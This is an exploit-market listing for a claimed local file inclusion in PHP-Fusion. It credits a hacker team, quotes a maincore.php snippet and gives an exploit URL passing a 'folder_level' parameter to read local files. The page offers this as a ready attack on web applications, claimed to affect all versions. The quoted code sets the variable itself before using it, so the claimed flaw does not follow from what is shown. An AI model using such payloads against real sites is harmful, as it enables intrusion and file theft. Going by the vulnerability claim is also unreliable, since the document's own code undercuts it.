[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHP-Fusion Local File Inclusion Vulnerability

Author
MoDaMeR
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13709
Category
web applications
Date add
15-08-2010
Platform
php
=============================================
PHP-Fusion Local File Inclusion Vulnerability
=============================================

# Author: MoDaMeR
# Email: k@live.ma
# My Sites : www.v4-team.com & www.hackteach.org
# Script home: http://www.phpfusion-ar.com
# download Script:
http://www.phpfusion-ar.com/downloads.php?cat_id=1&download_id=91
# Version:all
# Tested on: Linux
# Team hacker:Mr.Mo0oM & Dr.xp
                          ?????? ???? ????? ???
                         :::::::::::::::::::::::::
=================Exploit=================
maincore.php
[php]
 // Locate config.php and set the basedir path
$folder_level = ""; $i = 0;
while (!file_exists($folder_level."config.php")) {
    $folder_level .= "../"; $i++;
    if ($i == 5) { die("Config file not found"); }
}
require_once $folder_level."config.php";
define("BASEDIR", $folder_level);
[/php]
----exploit----
 
http://{localhost}/{path}/maincore.php?folder_level=LFI
 
---------greatz----------
Greatz to :
aB0 m0h4mM3d , and all v4-team & hackteach members



#  0day.today [2024-05-20]  #